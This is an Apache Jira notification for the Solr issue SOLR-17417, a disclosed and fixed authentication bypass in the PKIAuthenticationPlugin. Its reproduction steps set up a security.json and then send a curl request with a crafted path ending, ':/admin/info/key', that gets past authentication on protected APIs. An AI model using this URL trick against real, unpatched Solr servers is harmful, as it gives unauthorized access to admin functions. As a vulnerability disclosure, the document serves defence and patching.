[
https://issues.apache.org/jira/browse/SOLR-17417?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Houston Putman updated SOLR-17417:
----------------------------------
Security: (was: Private (Security Issue))
> Authentication bypass possible using a fake :/admin/info/key URL Path ending
> ----------------------------------------------------------------------------
>
> Key: SOLR-17417
> URL: https://issues.apache.org/jira/browse/SOLR-17417
> Project: Solr
> Issue Type: Bug
> Components: Authorization
> Reporter: Houston Putman
> Assignee: Houston Putman
> Priority: Blocker
> Fix For: 8.11.3, 9.7
>
> Attachments: SOLR-17417.patch
>
>
> By using ":/admin/info/key" at the end of the URL, the
> PKIAuthenticationPlugin can be bypassed, so that non-authorized users can
> access protected APIs.
> Reproduction:
> # Start Solr
> # {{./zkcli.sh -zkhost localhost:9983 -cmd put /security.json
> '\{"authentication":{"class":"solr.BasicAuthPlugin","credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
>
> Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}},"authorization":\{"class":"solr.RuleBasedAuthorizationPlugin","permissions":[{"name":"security-edit","role":"admin"}],"user-role":\{"solr":"admin"}}}'}}
> # {{curl -H "SolrAuth: XXXXX"
> [http://127.0.0.1:8983/solr/admin/info/properties:/admin/info/key]}}
> {{The request should fail, but it will succeed.}}
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
